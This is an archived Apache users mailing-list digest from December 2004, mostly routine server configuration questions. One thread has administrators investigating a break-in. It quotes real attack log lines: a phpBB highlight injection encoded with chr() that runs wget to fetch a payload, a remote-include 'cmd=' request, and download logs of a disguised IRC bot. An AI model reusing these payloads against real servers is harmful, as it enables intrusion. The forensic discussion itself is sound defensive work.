httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Mark Huth" <mh...@coldswim.com>
Subject [users@httpd] RE: users Digest 4 Dec 2004 17:11:47 -0000 Issue 1804
Date Sat, 04 Dec 2004 17:17:14 GMT
I'll be here

-----Original Message-----
From: users-digest-help@httpd.apache.org
[mailto:users-digest-help@httpd.apache.org] 
Sent: Saturday, December 04, 2004 9:12 AM
To: users@httpd.apache.org
Subject: users Digest 4 Dec 2004 17:11:47 -0000 Issue 1804

users Digest 4 Dec 2004 17:11:47 -0000 Issue 1804

Topics (messages 47576 through 47605):

SSL with apache and tomcat
	47576 by: Alec Cove

Flex command missing
	47577 by: TAYLOR, TIM \(CONTRACTOR\)
	47585 by: Joshua Slive

Security issue with 2.0.50
	47578 by: Arthur Kerpician
	47587 by: Ivan Barrera A.
	47588 by: Shannon Eric Peevey
	47589 by: Ivan Barrera A.
	47602 by: Arthur Kerpician
	47604 by: Shannon Eric Peevey

Apache listening on :8081
	47579 by: O-One
	47580 by: Nelson, Robert D.
	47581 by: Leach, Henry
	47582 by: O-One
	47583 by: Nelson, Robert D.
	47584 by: Patrick Campbell
	47599 by: O-One

Re: internal error running cgi script
	47586 by: Ben Kuang
	47590 by: Joshua Slive

Why is DocumentRoot returning an error
	47591 by: Eric Wagar

"if CGI enabled" condition
	47592 by: ms419.freezone.co.uk
	47598 by: Joshua Slive

mod_proxy_ajp experience
	47593 by: Mitya

RewriteRule problem....
	47594 by: Andrew M
	47596 by: Andrew M
	47597 by: Andrew M

mod_rewrite blocking a client-side map
	47595 by: Don Raikes

Re: Error Message:  [warn] (128)Network is unreachable: connect to listener
	47600 by: Mack Lundy

rewriterule problem: .css or .xss not being processed
	47601 by: Don Raikes

RewriteRule - if Not
	47603 by: Andrew M
	47605 by: Leif W

Administrivia:

To subscribe to the digest, e-mail:
	users-digest-subscribe@httpd.apache.org

To unsubscribe from the digest, e-mail:
	users-digest-unsubscribe@httpd.apache.org

To post to the list, e-mail:
	users@httpd.apache.org


----------------------------------------------------------------------
Date: Fri, 3 Dec 2004 17:50:41 -0500
To: <users@httpd.apache.org>
From: "Alec Cove" <alec@cove.org>
Subject: SSL with apache and tomcat
Message-ID: <GCEFJJPINNBMFLKNCBCNOEGACJAA.alec@cove.org>

Hello,

My server is setup with the following

Red Hat Enterprise Linux AS release 3
mod_jk 1.2
Apache 2.0.46
Tomcat 4.1.30

I have static files on apache and jsp's on tomcat. The
application on tomcat is an administration tool. Currently
all *.jsp files are passed to tomcat from the virtual host
container in httpd.conf:

JkMount /*.jsp wrkr. wrkr is defined in workers.properties
in tomcat conf/jk

all the .jsp files in my /admin directory are password
protected by security-constraint/login-config in my webapps
web.xml file and tomcat-users.xml. This all works fine.

However I would like the /admin directory on tomcat to be
protected with SSL. I have already set up SSL on tomcat, but
I still need a way to pass the SSL request from apache to
tomcat. I've been all around the docs and google, but
couldnt find a definitive set of steps on how to do this
(successfully). Could really use some help.

TIA

------------------------------

Date: Fri, 3 Dec 2004 17:58:47 -0500
To: <users@httpd.apache.org>
From: "TAYLOR, TIM \(CONTRACTOR\)" <TIM.TAYLOR@DFAS.MIL>
Subject: Flex command missing
Message-ID:
<932ACD88A2215048AB039F28F23CC143047ADD08@iso-e2-w-1.ds.dfas.mil>

I am building Apache 2.0.52 on Solaris 9. I get this error regarding =
flex that I did not get in 2.0.50.=20

Any ideas what I need to do. I am having trouble finding this package =
(if it is one).

bash: flex: command not found
*** Error code 127
make: Fatal error: Command failed for target `ssl_expr_scan.c'
Current working directory /tmp/timtaylor/httpd-2.0.52-new/modules/ssl
*** Error code 1
make: Fatal error: Command failed for target `all-recursive'
Current working directory /tmp/timtaylor/httpd-2.0.52-new/modules/ssl
*** Error code 1
make: Fatal error: Command failed for target `all-recursive'
Current working directory /tmp/timtaylor/httpd-2.0.52-new/modules
*** Error code 1
make: Fatal error: Command failed for target `all-recursive'

regards,
tt

------------------------------

Date: Fri, 3 Dec 2004 19:18:23 -0500
To: users@httpd.apache.org
From: Joshua Slive <jslive@gmail.com>
Subject: Re: [users@httpd] Flex command missing
Message-ID: <e498c16604120316187ffecb1f@mail.gmail.com>

On Fri, 3 Dec 2004 17:58:47 -0500, TAYLOR, TIM (CONTRACTOR)
<tim.taylor@dfas.mil> wrote:
> I am building Apache 2.0.52 on Solaris 9. I get this error regarding flex
that I did not get in 2.0.50.
> 
> Any ideas what I need to do. I am having trouble finding this package (if
it is one).
> 
> bash: flex: command not found
> *** Error code 127
> make: Fatal error: Command failed for target `ssl_expr_scan.c'

It sounds like the time-stamps in your tarball are off for some
reason.  You can probably work around the problem by finding the file
ssl_expr_scan.c and running "touch" on it.

Joshua.

------------------------------

Date: Sat, 04 Dec 2004 01:05:42 +0200
To: users@httpd.apache.org
From: Arthur Kerpician <arthur@bluechip.ro>
Subject: Security issue with 2.0.50
Message-ID: <41B0F146.9040309@bluechip.ro>

Hi all,
A few days ago I noticed a problem which I didn't encountered in over 2 
years of using apache! On my apache 2.0.50 / mod_ssl / php 4.3.8 server 
someone could write in my /tmp directory (or download files as you can 
see from the logs bellow) and execute processes under common used names 
(qmail-remote, httpd etc). Most of these processes opened remote 
connections on port 6667 and, as I further saw, were used for a psybnc 
(which I really don't know what it does except that is used on IRC).
This is a part from the error_log:
----------------------------------------------------------------------------
--------------
[Tue Nov 30 11:13:09 2004] [notice] Apache/2.0.50 (Unix) mod_ssl/2.0.50 
OpenSSL/0.9.7a PHP/4.3.8 configured -- resuming normal
sh: line 1: a.html: Permission denied
sh: line 1: a.html: Permission denied
--11:38:45--  http://security.cnc.net/bind.tgz
           => `bind.tgz'
Resolving security.cnc.net... done.
Connecting to security.cnc.net[207.155.252.37]:80... connected.
HTTP request sent, awaiting response... 404 Not Found
11:38:46 ERROR 404: Not Found.

mkdir: cannot create directory `.a': File exists
--11:38:46--  http://security.cnc.net/bind.tgz
           => `bind.tgz'
Resolving security.cnc.net... done.
Connecting to security.cnc.net[207.155.252.70]:80... connected.
HTTP request sent, awaiting response... 404 Not Found
11:38:47 ERROR 404: Not Found.

--22:56:25--  http://www.security.cnc.net/qmail.tgz
           => `qmail.tgz'
Resolving www.security.cnc.net... done.
Connecting to www.security.cnc.net[207.155.248.45]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 211,097 [application/x-compressed]

    0K .......... .......... .......... .......... .......... 24%   
46.82 KB/s
   50K .......... .......... .......... .......... .......... 48%   
77.16 KB/s
  100K .......... .......... .......... .......... .......... 72%   
62.27 KB/s
  150K .......... .......... .......... .......... .......... 97%   
75.30 KB/s
  200K ......                                                100%  
192.17 KB/s

22:56:29 (64.12 KB/s) - `qmail.tgz' saved [211097/211097]
----------------------------------------------------------------------------
--------------

Today I upgraded to 2.0.52 and re-checked my httpd.conf file. Until now 
everything's ok but if somebody can explain what was I experienced I'd 
be gratefull. I read on some sites about a worm exploiting a 
vulnerability in OpenSSL but I'm not sure if that's the case.

Thanks for any replies,
Arthur

------------------------------

Date: Fri, 03 Dec 2004 21:36:29 -0400
To:  users@httpd.apache.org
From: "Ivan Barrera A." <Bruce@Ivn.cl>
Subject: Re: [users@httpd] Security issue with 2.0.50
Message-ID: <41B1149D.8040301@Ivn.cl>

That's not apache. (im pretty sure...) Thats a insecure php (register 
globals on probably) and someone used a "code inject" on you.
Php Nuke's mods usually are vulnerable to that.

After the code injection, the script kiddie need a place to put , 
uncompress and run the software he uploaded.. usually /tmp /var/tmp 
/dev/shm .. etc..
How to secure this ?
in php.ini register globals MUST be off. /tmp should not be able to exec 
stuff (i usually link /var/tmp and /usr/tmp to /tmp, and mount tmp as 
noexec)

I may be wrong about it is php.. but that's how they run sw on your machine.

Arthur Kerpician wrote:
> Hi all,
> A few days ago I noticed a problem which I didn't encountered in over 2 
> years of using apache! On my apache 2.0.50 / mod_ssl / php 4.3.8 server 
> someone could write in my /tmp directory (or download files as you can 
> see from the logs bellow) and execute processes under common used names 
> (qmail-remote, httpd etc). Most of these processes opened remote 
> connections on port 6667 and, as I further saw, were used for a psybnc 
> (which I really don't know what it does except that is used on IRC).
> This is a part from the error_log:
>
----------------------------------------------------------------------------
-------------- 
> 
> [Tue Nov 30 11:13:09 2004] [notice] Apache/2.0.50 (Unix) mod_ssl/2.0.50 
> OpenSSL/0.9.7a PHP/4.3.8 configured -- resuming normal
> sh: line 1: a.html: Permission denied
> sh: line 1: a.html: Permission denied
> --11:38:45--  http://security.cnc.net/bind.tgz
>           => `bind.tgz'
> Resolving security.cnc.net... done.
> Connecting to security.cnc.net[207.155.252.37]:80... connected.
> HTTP request sent, awaiting response... 404 Not Found
> 11:38:46 ERROR 404: Not Found.
> 
> mkdir: cannot create directory `.a': File exists
> --11:38:46--  http://security.cnc.net/bind.tgz
>           => `bind.tgz'
> Resolving security.cnc.net... done.
> Connecting to security.cnc.net[207.155.252.70]:80... connected.
> HTTP request sent, awaiting response... 404 Not Found
> 11:38:47 ERROR 404: Not Found.
> 
> --22:56:25--  http://www.security.cnc.net/qmail.tgz
>           => `qmail.tgz'
> Resolving www.security.cnc.net... done.
> Connecting to www.security.cnc.net[207.155.248.45]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 211,097 [application/x-compressed]
> 
>    0K .......... .......... .......... .......... .......... 24%   46.82 
> KB/s
>   50K .......... .......... .......... .......... .......... 48%   77.16 
> KB/s
>  100K .......... .......... .......... .......... .......... 72%   62.27 
> KB/s
>  150K .......... .......... .......... .......... .......... 97%   75.30 
> KB/s
>  200K ......                                                100%  192.17 
> KB/s
> 
> 22:56:29 (64.12 KB/s) - `qmail.tgz' saved [211097/211097]
>
----------------------------------------------------------------------------
-------------- 
> 
> 
> Today I upgraded to 2.0.52 and re-checked my httpd.conf file. Until now 
> everything's ok but if somebody can explain what was I experienced I'd 
> be gratefull. I read on some sites about a worm exploiting a 
> vulnerability in OpenSSL but I'm not sure if that's the case.
> 
> Thanks for any replies,
> Arthur
> 
> 
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>   "   from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
> 

------------------------------

Date: Fri, 03 Dec 2004 19:30:14 -0600
To: users@httpd.apache.org
From: Shannon Eric Peevey <speeves@unt.edu>
Subject: Re: [users@httpd] Security issue with 2.0.50
Message-ID: <41B11326.5020101@unt.edu>

>> --22:56:25--  http://www.security.cnc.net/qmail.tgz
>>           => `qmail.tgz'
>> Resolving www.security.cnc.net... done.
>> Connecting to www.security.cnc.net[207.155.248.45]:80... connected.
>> HTTP request sent, awaiting response... 200 OK
>> Length: 211,097 [application/x-compressed]
>>
>>    0K .......... .......... .......... .......... .......... 24%   
>> 46.82 KB/s
>>   50K .......... .......... .......... .......... .......... 48%   
>> 77.16 KB/s
>>  100K .......... .......... .......... .......... .......... 72%   
>> 62.27 KB/s
>>  150K .......... .......... .......... .......... .......... 97%   
>> 75.30 KB/s
>>  200K ......                                                100%  
>> 192.17 KB/s
>>
>> 22:56:29 (64.12 KB/s) - `qmail.tgz' saved [211097/211097]
>>
----------------------------------------------------------------------------
-------------- 
>>
>>
>> Today I upgraded to 2.0.52 and re-checked my httpd.conf file. Until 
>> now everything's ok but if somebody can explain what was I 
>> experienced I'd be gratefull. I read on some sites about a worm 
>> exploiting a vulnerability in OpenSSL but I'm not sure if that's the 
>> case.
>
I downloaded the qmail.tgz, and it is really EnergyMech in disguise:

http://www.energymech.net/

It seems like IRC bots, bombs, etc., are about the most popular uses for 
these types of hacks. 

First, I would rebuild the machine,  (After you do some forensic 
analysis, of course :) ).  I agree with Ivan on this, though it could 
also be safe_mode=off, or php 4.3.8 was also vulnerable to a file upload 
vulnerability:

http://securityfocus.net/bid/11190/info/

I would look through your apache logs for shell commands, such as wget, 
ls, etc., and you might be able to trace the exact vulnerability that 
these people used.  Here is an example from a machine that was exploited 
with a safe_mode=off exploit:

access_log:68.223.190.5 - - [29/Oct/2004:10:20:08 -0500] "GET 
/pollvote/pollvote.php?pollname=http://www.ka0ticl4b.hpgvip.com.br/cse.jpg?&
cmd=id;uname%20-a 
HTTP/1.1" 200 1119 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 
5.1)" 1101/3049 (36%)

You'll notice the commands after 'cmd='.  (Exploiting a file in the 
pollvote application).

Let me know what you find.  (Contact me offlist, if you would like some 
help).

thanks,

-- 
Shannon Eric Peevey                     =>  "speeves"
Dyno-Mite! System Administrator         =>  speeves@unt.edu
Central Web Support                     =>  (940) 369-8876
University of North Texas               =>  http://web2.unt.edu

------------------------------

Date: Fri, 03 Dec 2004 23:13:00 -0400
To:  users@httpd.apache.org
From: "Ivan Barrera A." <Bruce@Ivn.cl>
Subject: Re: [users@httpd] Security issue with 2.0.50
Message-ID: <41B12B3C.4090307@Ivn.cl>

Hi

Glad we agree :P

Following the safe_mode = off issue. a friend of mine, is using some 
kind of "online shop service" (dont know which one), and whenever we try 
to put safe_mode=on the shop says that it cant access tmp dir (/tmp) to 
use sessions and other stuff.
I tried creating and configuring a user-local tmp dir, with no luck 
(obviously modifying the source code).
I think this is a coding problem, but he dont want to recode the system 
(tipycal user excuse "it worked before"). Any hints ?

Well, any pointers will be well received :)

Be Excellent to each others !!

Shannon Eric Peevey wrote:
> 
>>> --22:56:25--  http://www.security.cnc.net/qmail.tgz
>>>           => `qmail.tgz'
>>> Resolving www.security.cnc.net... done.
>>> Connecting to www.security.cnc.net[207.155.248.45]:80... connected.
>>> HTTP request sent, awaiting response... 200 OK
>>> Length: 211,097 [application/x-compressed]
>>>
>>>    0K .......... .......... .......... .......... .......... 24%   
>>> 46.82 KB/s
>>>   50K .......... .......... .......... .......... .......... 48%   
>>> 77.16 KB/s
>>>  100K .......... .......... .......... .......... .......... 72%   
>>> 62.27 KB/s
>>>  150K .......... .......... .......... .......... .......... 97%   
>>> 75.30 KB/s
>>>  200K ......                                                100%  
>>> 192.17 KB/s
>>>
>>> 22:56:29 (64.12 KB/s) - `qmail.tgz' saved [211097/211097]
>>>
----------------------------------------------------------------------------
-------------- 
>>>
>>>
>>> Today I upgraded to 2.0.52 and re-checked my httpd.conf file. Until 
>>> now everything's ok but if somebody can explain what was I 
>>> experienced I'd be gratefull. I read on some sites about a worm 
>>> exploiting a vulnerability in OpenSSL but I'm not sure if that's the 
>>> case.
>>
>>
> I downloaded the qmail.tgz, and it is really EnergyMech in disguise:
> 
> http://www.energymech.net/
> 
> It seems like IRC bots, bombs, etc., are about the most popular uses for 
> these types of hacks.
> First, I would rebuild the machine,  (After you do some forensic 
> analysis, of course :) ).  I agree with Ivan on this, though it could 
> also be safe_mode=off, or php 4.3.8 was also vulnerable to a file upload 
> vulnerability:
> 
> http://securityfocus.net/bid/11190/info/
> 
> I would look through your apache logs for shell commands, such as wget, 
> ls, etc., and you might be able to trace the exact vulnerability that 
> these people used.  Here is an example from a machine that was exploited 
> with a safe_mode=off exploit:
> 
> access_log:68.223.190.5 - - [29/Oct/2004:10:20:08 -0500] "GET 
>
/pollvote/pollvote.php?pollname=http://www.ka0ticl4b.hpgvip.com.br/cse.jpg?&
cmd=id;uname%20-a 
> HTTP/1.1" 200 1119 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 
> 5.1)" 1101/3049 (36%)
> 
> You'll notice the commands after 'cmd='.  (Exploiting a file in the 
> pollvote application).
> 
> Let me know what you find.  (Contact me offlist, if you would like some 
> help).
> 
> thanks,
> 

------------------------------

Date: Sat, 04 Dec 2004 18:48:03 +0200
To: users@httpd.apache.org
From: Arthur Kerpician <arthur@bluechip.ro>
Subject: Re: [users@httpd] Security issue with 2.0.50
Message-ID: <41B1EA43.6010700@bluechip.ro>

Shannon Eric Peevey wrote:

>
>>> --22:56:25--  http://www.security.cnc.net/qmail.tgz
>>>           =3D> `qmail.tgz'
>>> Resolving www.security.cnc.net... done.
>>> Connecting to www.security.cnc.net[207.155.248.45]:80... connected.
>>> HTTP request sent, awaiting response... 200 OK
>>> Length: 211,097 [application/x-compressed]
>>>
>>>    0K .......... .......... .......... .......... .......... 24%  =20
>>> 46.82 KB/s
>>>   50K .......... .......... .......... .......... .......... 48%  =20
>>> 77.16 KB/s
>>>  100K .......... .......... .......... .......... .......... 72%  =20
>>> 62.27 KB/s
>>>  150K .......... .......... .......... .......... .......... 97%  =20
>>> 75.30 KB/s
>>>  200K ......                                                100% =20
>>> 192.17 KB/s
>>>
>>> 22:56:29 (64.12 KB/s) - `qmail.tgz' saved [211097/211097]
>>> ---------------------------------------------------------------------=
---------------------=20
>>>
>>>
>>> Today I upgraded to 2.0.52 and re-checked my httpd.conf file. Until=20
>>> now everything's ok but if somebody can explain what was I=20
>>> experienced I'd be gratefull. I read on some sites about a worm=20
>>> exploiting a vulnerability in OpenSSL but I'm not sure if that's the =

>>> case.
>>
>>
> I downloaded the qmail.tgz, and it is really EnergyMech in disguise:
>
> http://www.energymech.net/
>
> It seems like IRC bots, bombs, etc., are about the most popular uses=20
> for these types of hacks.
> First, I would rebuild the machine,  (After you do some forensic=20
> analysis, of course :) ).  I agree with Ivan on this, though it could=20
> also be safe_mode=3Doff, or php 4.3.8 was also vulnerable to a file=20
> upload vulnerability:
>
> http://securityfocus.net/bid/11190/info/
>
> I would look through your apache logs for shell commands, such as=20
> wget, ls, etc., and you might be able to trace the exact vulnerability =

> that these people used.  Here is an example from a machine that was=20
> exploited with a safe_mode=3Doff exploit:
>
> access_log:68.223.190.5 - - [29/Oct/2004:10:20:08 -0500] "GET=20
> /pollvote/pollvote.php?pollname=3Dhttp://www.ka0ticl4b.hpgvip.com.br/cs=
e.jpg?&cmd=3Did;uname%20-a=20
> HTTP/1.1" 200 1119 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT=20
> 5.1)" 1101/3049 (36%)
>
> You'll notice the commands after 'cmd=3D'.  (Exploiting a file in the=20
> pollvote application).
>
> Let me know what you find.  (Contact me offlist, if you would like=20
> some help).
>
> thanks,
>
I got to the bottom of it and this is what I had found:
forum.protected.com-access_log:200.140.216.79 - - [04/Dec/2004:06:55:54=20
+0200] "GET=20
/viewtopic.php?t=3D139&highlight=3D%2527%252esystem(chr(101)%252echr(99)%=
252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(9=
9)%252echr(111)%252echr(109)%252echr(101)%252echr(99)%252echr(111)%252ech=
r(59)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(118)%252ec=
hr(97)%252echr(114)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%25=
2echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)=
%252echr(104)%252echr(116)%252echr(116)%252echr(112)%252echr(58)%252echr(=
47)%252echr(47)%252echr(104)%252echr(111)%252echr(111)%252echr(98)%252ech=
r(46)%252echr(119)%252echr(101)%252echr(98)%252echr(99)%252echr(105)%252e=
chr(110)%252echr(100)%252echr(97)%252echr(114)%252echr(105)%252echr(111)%=
252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(100=
)%252echr(48)%252echr(115)%252echr(46)%252echr(116)%252echr(120)%252echr(=
116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252e=
chr(32)%252echr(100)%252echr(48)%252echr(115)%252echr(46)%252echr(116)%25=
2echr(120)%252echr(116)%252echr(59)%252echr(101)%252echr(99)%252echr(104)=
%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(102)%252echr(=
105)%252echr(109))%252e%2527=20
HTTP/1.0" 200 13994

It seems that the gateway for my server's vulnerability was phpBB-2.0.4. =

If convert the ascii in the url to chars it will give you this:
echo uncomeco;cd /var/tmp;wget http://hoob.webcindario.com/bla..bla...
Eric, you were right by giving me the example with pollvote...that made=20
me look into all sites' logs hosted on that server. The forum was the=20
only site which recorded this kind of requests (I did a `grep=20
/www/logs/*access_log* echr` on all access logs). There were several=20
records like the one above with IP's coming from Brazil, Dominican=20
Republic, Spain, Germany, AOL...I guess untraceable proxys.

I upgraded today to phpBB-2.0.11, the latest stable release tagged by=20
the authors as "critical update". Thanks all for your fast replies, I'll =

keep posting on the subject if the matter isn't solved.

------------------------------

Date: Sat, 04 Dec 2004 11:02:08 -0600
To: users@httpd.apache.org
From: Shannon Eric Peevey <speeves@unt.edu>
Subject: Re: [users@httpd] Security issue with 2.0.50
Message-ID: <41B1ED90.10207@unt.edu>

Arthur Kerpician wrote:

>>
> I got to the bottom of it and this is what I had found:
> forum.protected.com-access_log:200.140.216.79 - -=20
> [04/Dec/2004:06:55:54 +0200] "GET=20
> /viewtopic.php?t=3D139&highlight=3D%2527%252esystem(chr(101)%252echr(99=
)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr=
(99)%252echr(111)%252echr(109)%252echr(101)%252echr(99)%252echr(111)%252e=
chr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(118)%252=
echr(97)%252echr(114)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%=
252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(3=
2)%252echr(104)%252echr(116)%252echr(116)%252echr(112)%252echr(58)%252ech=
r(47)%252echr(47)%252echr(104)%252echr(111)%252echr(111)%252echr(98)%252e=
chr(46)%252echr(119)%252echr(101)%252echr(98)%252echr(99)%252echr(105)%25=
2echr(110)%252echr(100)%252echr(97)%252echr(114)%252echr(105)%252echr(111=
)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(1=
00)%252echr(48)%252echr(115)%252echr(46)%252echr(116)%252echr(120)%252ech=
r(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%25=
2echr(32)%252echr(100)%252echr(48)%252echr(115)%252echr(46)%252echr(116)%=
252echr(120)%252echr(116)%252echr(59)%252echr(101)%252echr(99)%252echr(10=
4)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(102)%252ech=
r(105)%252echr(109))%252e%2527=20
> HTTP/1.0" 200 13994
>
> It seems that the gateway for my server's vulnerability was=20
> phpBB-2.0.4. If convert the ascii in the url to chars it will give you =

> this:
> echo uncomeco;cd /var/tmp;wget http://hoob.webcindario.com/bla..bla...
> Eric, you were right by giving me the example with pollvote...that=20
> made me look into all sites' logs hosted on that server. The forum was =

> the only site which recorded this kind of requests (I did a `grep=20
> /www/logs/*access_log* echr` on all access logs). There were several=20
> records like the one above with IP's coming from Brazil, Dominican=20
> Republic, Spain, Germany, AOL...I guess untraceable proxys.
>
> I upgraded today to phpBB-2.0.11, the latest stable release tagged by=20
> the authors as "critical update". Thanks all for your fast replies,=20
> I'll keep posting on the subject if the matter isn't solved.
>
Arthur,

Great!!  Yeah, there are all kinds of SQL injection issues in=20
phpBB-2.0.10, so its good you have 2.0.11 installed now.  I know this is =

an Apache list, but should follow this up with the location of the patch =

for anyone that is not able to upgrade to phpBB-2.0.11 yet:

http://www.phpbb.com/phpBB/viewtopic.php?f=3D14&t=3D240513

Ivan, if you see how phpBB2 is dealing with safe_mode=3DOn, they have you=
=20
create a tmp dir under the bulletin board root chmod'd to 777...  You're =

guess is as good as mine as to the actual security of this fix.  It=20
seems to me that safe_mode is still largely ignored by many PHP=20
application developers, (photo galleries in particular), so it might not =

be feasible to run your application in safe_mode.  I didn't explore the=20
exact vulnerability in pollvote.php, but I assume it must be a weakness=20
form validation.=20

see ya'll,

--=20
Shannon Eric Peevey                     =3D>  "speeves"
Dyno-Mite! System Administrator         =3D>  speeves@unt.edu
Central Web Support                     =3D>  (940) 369-8876
University of North Texas               =3D>  http://web2.unt.edu

------------------------------

Date: Fri, 3 Dec 2004 15:09:29 -0800 (PST)
To: users@httpd.apache.org
From: O-One <ola_one@yahoo.com>
Subject: Apache listening on :8081
Message-ID: <20041203230929.39084.qmail@web13807.mail.yahoo.com>

--0-93426405-1102115369=:37974
Content-Type: text/plain; charset=us-ascii

Hello all,
 
I am trying to install my Apache on a Windows 2003 Server. Knowing that
Apache by default is on Port 80. If I put Apache on say Port 8081, is it
true that because of that, when anyone needs to reach my site, instead of
typing www.abc.com they must now type www.abc.com:8081 
 
I need to use a port other than Port 80 to host Apache, if the above
statement is true, is there a way to work around having to put the number at
the end of the site name? 
 
Thank you

		
---------------------------------
Do you Yahoo!?
 Dress up your holiday email, Hollywood style. Learn more.
--0-93426405-1102115369=:37974
Content-Type: text/html; charset=us-ascii

<DIV>Hello all,</DIV>
<DIV>&nbsp;</DIV>
<DIV>I am trying to install my Apache on a Windows 2003 Server. Knowing that
Apache by default is on Port 80. If I put Apache on say Port 8081, is it
true that because of that, when anyone needs to reach my site, instead of
typing <A href="http://www.abc.com">www.abc.com</A> they must now type <A
href="http://www.abc.com:8081">www.abc.com:8081</A>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>I need to use a port other than Port 80 to host Apache, if the above
statement is true, is there a way to work around having to put the number at
the end of the site name? </DIV>
<DIV>&nbsp;</DIV>
<DIV>Thank you</DIV><p>
		<hr size=1>Do you Yahoo!?<br> 
Dress up your holiday email, Hollywood style. <a
href="http://us.rd.yahoo.com/evt=29909/*http://celebrity.mail.yahoo.com">Lea
rn more.</a>
--0-93426405-1102115369=:37974--

------------------------------

Date: Fri, 3 Dec 2004 17:16:45 -0600 
To: "'users@httpd.apache.org'" <users@httpd.apache.org>
From: "Nelson, Robert D." <RDNelson@Mail.Donaldson.com>
Subject: RE: [users@httpd] Apache listening on :8081
Message-ID: <11864A3328DDD5119DE70002A540D64A110ACD22@ntblm16>

> I am trying to install my Apache on a Windows 2003 Server. Knowing that
> Apache by default is on Port 80. If I put Apache on say Port 8081, is it
> true that because of that, when anyone needs to reach my site, instead of
> typing www.abc.com they must now type www.abc.com:8081 

That's true.

> I need to use a port other than Port 80 to host Apache, if the above
> statement is true, is there a way to work around having to put the number
> at the end of the site name? 

When a user doesn't type in a port number, the browser assumes :80. There is
no way around this. However, you could always proxy from a server on :80 to
your server on :8081. That usually works well.

 ~ Robert

------------------------------

Date: Fri, 3 Dec 2004 15:16:20 -0800 
To: "'users@httpd.apache.org'" <users@httpd.apache.org>
From: "Leach, Henry" <HLeach@cc.ucsf.edu>
Subject: RE: [users@httpd] Apache listening on :8081
Message-ID: <E79C469A88A9E84E9384F46E700F1B201CDCCB@cc.ucsf.edu>

------_=_NextPart_001_01C4D98E.193BCF30
Content-Type: text/plain

Do you have information on how to do the Proxy technique?

-----Original Message-----
From: Nelson, Robert D. [mailto:RDNelson@Mail.Donaldson.com] 
Sent: Friday, December 03, 2004 3:17 PM
To: 'users@httpd.apache.org'
Subject: RE: [users@httpd] Apache listening on :8081

> I am trying to install my Apache on a Windows 2003 Server. Knowing 
> that Apache by default is on Port 80. If I put Apache on say Port 
> 8081, is it true that because of that, when anyone needs to reach my 
> site, instead of typing www.abc.com they must now type 
> www.abc.com:8081

That's true.

> I need to use a port other than Port 80 to host Apache, if the above 
> statement is true, is there a way to work around having to put the 
> number at the end of the site name?

When a user doesn't type in a port number, the browser assumes :80. There is
no way around this. However, you could always proxy from a server on :80 to
your server on :8081. That usually works well.

 ~ Robert

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

------_=_NextPart_001_01C4D98E.193BCF30
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; =
charset=3Dus-ascii">
<META NAME=3D"Generator" CONTENT=3D"MS Exchange Server version =
5.5.2654.45">
<TITLE>RE: [users@httpd] Apache listening on :8081</TITLE>
</HEAD>
<BODY>
<BR>
<BR>

<P><FONT SIZE=3D2>Do you have information on how to do the Proxy =
technique?</FONT>
</P>

<P><FONT SIZE=3D2>-----Original Message-----</FONT>
<BR><FONT SIZE=3D2>From: Nelson, Robert D. [<A =
HREF=3D"mailto:RDNelson@Mail.Donaldson.com">mailto:RDNelson@Mail.Donalds=
on.com</A>] </FONT>
<BR><FONT SIZE=3D2>Sent: Friday, December 03, 2004 3:17 PM</FONT>
<BR><FONT SIZE=3D2>To: 'users@httpd.apache.org'</FONT>
<BR><FONT SIZE=3D2>Subject: RE: [users@httpd] Apache listening on =
:8081</FONT>
</P>

<P><FONT SIZE=3D2>&gt; I am trying to install my Apache on a Windows =
2003 Server. Knowing </FONT>
<BR><FONT SIZE=3D2>&gt; that Apache by default is on Port 80. If I put =
Apache on say Port </FONT>
<BR><FONT SIZE=3D2>&gt; 8081, is it true that because of that, when =
anyone needs to reach my </FONT>
<BR><FONT SIZE=3D2>&gt; site, instead of typing www.abc.com they must =
now type </FONT>
<BR><FONT SIZE=3D2>&gt; www.abc.com:8081</FONT>
</P>

<P><FONT SIZE=3D2>That's true.</FONT>
</P>

<P><FONT SIZE=3D2>&gt; I need to use a port other than Port 80 to host =
Apache, if the above </FONT>
<BR><FONT SIZE=3D2>&gt; statement is true, is there a way to work =
around having to put the </FONT>
<BR><FONT SIZE=3D2>&gt; number at the end of the site name?</FONT>
</P>

<P><FONT SIZE=3D2>When a user doesn't type in a port number, the =
browser assumes :80. There is no way around this. However, you could =
always proxy from a server on :80 to your server on :8081. That usually =
works well.</FONT></P>

<P><FONT SIZE=3D2>&nbsp;~ Robert</FONT>
</P>
<BR>

<P><FONT =
